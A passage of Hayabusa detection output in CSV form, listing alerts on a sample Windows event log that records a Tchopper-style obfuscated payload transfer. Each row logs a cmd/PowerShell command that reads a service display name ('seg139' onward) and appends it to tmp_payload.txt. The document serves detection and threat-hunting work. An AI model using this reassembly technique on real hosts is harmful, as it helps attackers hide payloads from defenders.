0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:49.493 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg139"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xef4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:49.493 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:50.961 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg140"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x61c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:50.961 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg140"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa74 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:50.961 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:52.418 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg141"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd30 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:52.418 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg141"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x42c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:52.418 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:53.856 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg142"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xbc8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:53.872 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg142"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd08 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:53.872 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:55.310 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg143"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xcbc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:55.310 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg143"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf60 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:55.310 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:56.748 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg144"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc24 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:56.764 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg144"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x3f4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:56.764 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:58.217 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg145"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xec8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:58.217 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg145"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe60 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:58.217 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:59.670 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg146"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe24 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:59.686 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg146"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf44 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:59.686 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:01.122 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg147"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x22c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:01.137 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg147"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x708 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:01.137 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:02.574 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg148"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x974 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:02.574 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg148"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb00 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:02.574 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:04.025 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg149"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x940 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:04.025 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg149"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf18 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:04.025 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:05.482 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg150"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xb1c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:05.482 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg150"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9c8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:05.482 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:06.935 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg151"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xff4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:06.935 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg151"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc18 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:06.935 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:08.391 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg152"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd00 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:08.391 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg152"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xef4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:08.391 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:09.863 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg153"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc14 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:09.863 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg153"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa74 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:09.863 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:11.334 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg154"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x218 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:11.334 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg154"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x42c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:11.334 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:12.782 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg155"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc74 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:12.782 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg155"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xdb0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:12.782 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:14.217 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg156"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6a4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:14.217 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg156"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xdd0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:14.217 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:15.662 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg157"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xff8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:15.662 